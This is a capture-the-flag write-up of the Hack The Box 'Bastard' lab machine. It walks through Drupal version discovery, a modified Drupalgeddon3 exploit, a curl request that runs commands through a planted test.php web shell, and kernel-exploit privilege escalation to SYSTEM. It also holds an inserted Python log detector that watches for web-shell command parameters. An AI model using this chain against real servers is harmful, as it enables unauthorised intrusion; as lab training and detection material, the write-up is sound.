HTB | Bastard

This is a Windows box. You can find it here.

Skills Learned

  • Enumerating CMS versions (Drupal)

  • Exploit modification

NMAP

IP: 10.10.10.9

nmap scan

Port 80

We found a Drupal website.

port 80

In robots.txt we found CHANGELOG.txt.

/robots.txt
/changelog.txt

We found Drupal 7.54.

Foothold/shell and Priv Esc

We found Drupalgeddon3 with searchsploit.

searchsploit

The Metasploit exploit was not working.

Let's try this. Change the URL, endpoint_path, filename and data values, then run it.

running php

It gave us two files: user.json and session.json.

user.json

Let's try to crack the administrator hash.

It is taking too much time, but we have an alternate way. Remember that we have test.php on the server. We can call it with curl:

curl "http://10.10.10.9/test.php?cmd=whoami"
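A detection-side view of the test.php?cmd=whoami request above, as an added example that is not part of the original write-up: it reads web server logs in W3C extended format (as written by IIS) and flags requests whose query-string values begin with an OS command. The log lines, the field selection, the WATCHED list and the function name are constructed assumptions.

```python
from urllib.parse import parse_qsl

# Constructed sample log in W3C extended format (not taken from the box).
SAMPLE_LOG = """\
#Version: 1.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-01 10:00:01 GET /index.php q=node/1 192.0.2.10 200
2024-01-01 10:00:05 GET /test.php cmd=whoami 192.0.2.66 200
2024-01-01 10:00:09 GET /test.php cmd=systeminfo 192.0.2.66 200
2024-01-01 10:00:12 GET /search.php cmd=list 192.0.2.10 200
2024-01-01 10:00:15 GET /test.php c=cmd.exe+%2Fc+whoami+%2Fpriv 192.0.2.66 200
2024-01-01 10:00:20 GET /robots.txt - 192.0.2.10 200
"""

# Assumed watch list: whoami and systeminfo are the commands run in this
# write-up; the rest are common Windows command interpreters and tools.
WATCHED = {"whoami", "systeminfo", "cmd", "cmd.exe",
           "powershell", "powershell.exe", "ipconfig"}


def find_command_requests(log_text):
    """Return (client_ip, uri, parameter, decoded_value) for suspect requests."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            # The column layout is declared in the log itself.
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        query = row.get("cs-uri-query", "-")
        if query == "-":  # "-" means the request had no query string
            continue
        # parse_qsl URL-decodes values, so "%2Fc" and "+" are normalised.
        for name, value in parse_qsl(query):
            tokens = value.lower().split()
            first = tokens[0] if tokens else ""
            # Drop any directory part: c:\windows\system32\cmd.exe -> cmd.exe
            first = first.replace("\\", "/").rsplit("/", 1)[-1]
            if first in WATCHED:
                hits.append((row.get("c-ip"), row.get("cs-uri-stem"), name, value))
                break
    return hits


if __name__ == "__main__":
    for hit in find_command_requests(SAMPLE_LOG):
        print(hit)
```

The match is on the decoded value rather than the parameter name, so cmd=list is not reported while c=cmd.exe /c whoami /priv is.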

Let's use windows-exploit-suggester.

Copy the systeminfo output.

systeminfo

Update the database and run it.

windows-exploit-suggester

Let's use this

We will copy the exe to the box.

putting exploit

Let's run it.

running exploit
getting shell

And we are nt authority\system.

Found user.txt.

user.txt

Found root.txt.

root.txt
